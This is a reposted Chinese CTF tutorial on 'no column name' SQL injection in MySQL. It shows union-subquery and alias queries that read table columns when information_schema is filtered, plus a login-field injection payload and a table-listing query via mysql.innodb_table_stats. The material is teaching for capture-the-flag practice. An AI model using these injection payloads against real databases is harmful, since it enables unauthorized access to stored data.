您的位置：首页 > 财经 > 产业 > CTF常用sql注入（三）无列名注入

CTF常用sql注入（三）无列名注入

2024/10/5 14:59:52 来源：https://blog.csdn.net/2301_81040377/article/details/140189235 浏览: 次关键词：CTF常用sql注入（三）无列名注入

0x06 无列名

适用于无法正确的查出结果，比如把information_schema给过滤了

select * from users;

在这里插入图片描述

select 1,2,3 union select * from users;

在这里插入图片描述

列名被替换成了1,2,3，
我们再利用子查询和别名查

select `2` from (select 1,2,3 union select * from users)a;

在这里插入图片描述
继续加大难度，不用反引号

select b from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
同时查询多个列

select concat(b,0x7e,c) from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
已知表名为flaga

password=\&username=,username=(select a from (select 1,2 as a,6 union select * from flaga limit 1,1)u)#

在这里插入图片描述
成功

也是针对or的过滤来查询表名

innodb_index_stats和innodb_table_stats表

例句，缺点就是只能查表，配合无列名查询一起食用

(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

声明：本站所有新闻及新闻图片来源于其他网站，如有侵权，请及时联系我们！